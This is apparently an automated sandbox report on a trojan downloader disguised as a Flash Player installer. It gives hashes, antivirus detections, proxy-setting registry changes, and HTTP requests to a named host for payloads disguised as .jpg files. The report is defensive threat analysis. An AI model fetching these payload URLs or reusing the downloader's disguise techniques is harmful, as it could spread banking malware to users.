Analysis Date: 2015-01-11 00:12:31
MD5: 2217ffbddebd085cef93c309a8d3fd25
SHA1: 1f6cd9e7504c082d74af9de83a7d34cb922ab1e4

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section UPX0: md5: cfb465a557f6d17567c5a2f0a915d676 sha1: 390c310f58c432f55ba5ba3efe5dbc2c2f8e9126 size: 258048
Section UPX1: md5: 1a1bac5f5b7a825aac577915aa1c5422 sha1: cece3b2dcc7fc24def7406443b11a2fafd15240f size: 147456
Section .rsrc: md5: 5c04843a4c4a790bd0ca17387d41ec01 sha1: 8ed1e35f2bf4ca6fe4b28998e0a080db92574f29 size: 7168
Timestamp: 1992-06-19 22:22:17
Version:
LegalCopyright:
InternalName:
FileVersion: 1.0.0.1
CompanyName: ADOBE MACROMEDIA
LegalTrademarks:
Comments: Flash Player install
ProductName:
ProductVersion: 1.0.0.0
FileDescription: Flash Player
OriginalFilename:
PEhash: fa0f7642e3fa4a97f869a1a1126bdf0c7f8db8ea
IMPhash: 9fbae326a7bee7f76e2670cb15d4a087
AV 360 Safe: no_virus
AV Ad-Aware: Gen:Variant.Barys.724
AV Alwil (avast): Banload-GGW [Trj]
AV Arcabit (arcavir): Gen:Variant.Barys.724
AV Authentium: W32/Banload.A.gen!Eldorado
AV Avira (antivir): TR/Spy.Banker.Gen
AV BullGuard: Gen:Variant.Barys.724
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): no_virus
AV ClamAV: no_virus
AV Dr. Web: Trojan.DownLoader6.58453
AV Emsisoft: Gen:Variant.Barys.724
AV Eset (nod32): Win32/TrojanDownloader.Dadobra.NDG
AV Fortinet: W32/Banload.AH!tr.dldr
AV Frisk (f-prot): W32/Banload.A.gen!Eldorado
AV F-Secure: Gen:Variant.Barys.724
AV Grisoft (avg): Win32/DH{gQwlV2JO}
AV Ikarus: Trojan-Downloader.Win32.Dadobra
AV K7: Trojan ( 00386dc51 )
AV Kaspersky: Trojan-Downloader.Win32.Banload.ypd
AV MalwareBytes: Trojan.MSIL
AV Mcafee: no_virus
AV Microsoft Security Essentials: TrojanDownloader:Win32/Banload.NJ
AV MicroWorld (escan): Gen:Variant.Barys.724
AV Rising: no_virus
AV Sophos: Mal/ZAccess-AH
AV Symantec: no_virus
AV Trend Micro: no_virus
AV VirusBlokAda (vba32): BScope.Trojan.Agent

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Creates Process: C:\WINDOWS\system32\process.exe
Winsock DNS: www.hosbeer.hpg.com.br
Winsock URL: http://www.hosbeer.hpg.com.br/winrom.jpg
Winsock URL: http://www.hosbeer.hpg.com.br/sphe.jpg
Winsock URL: http://www.hosbeer.hpg.com.br/imglog.jpg
Winsock URL: http://www.hosbeer.hpg.com.br/msshell.jpg
Winsock URL: http://www.hosbeer.hpg.com.br/process.jpg
Winsock URL: http://www.hosbeer.hpg.com.br/msne.jpg

Process
↳ C:\WINDOWS\system32\process.exe

Network Details:

DNS: www.hosbeer.hpg.com.br
Type: A
187.31.64.20
HTTP GET: http://www.hosbeer.hpg.com.br/imglog.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://www.hosbeer.hpg.com.br/msne.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://www.hosbeer.hpg.com.br/sphe.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://www.hosbeer.hpg.com.br/winrom.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://www.hosbeer.hpg.com.br/msshell.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://www.hosbeer.hpg.com.br/process.jpg
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1032 ➝ 187.31.64.20:80
Flows TCP: 192.168.1.1:1033 ➝ 187.31.64.20:80
Flows TCP: 192.168.1.1:1034 ➝ 187.31.64.20:80
Flows TCP: 192.168.1.1:1035 ➝ 187.31.64.20:80
Flows TCP: 192.168.1.1:1036 ➝ 187.31.64.20:80
Flows TCP: 192.168.1.1:1037 ➝ 187.31.64.20:80

Raw Pcap

Strings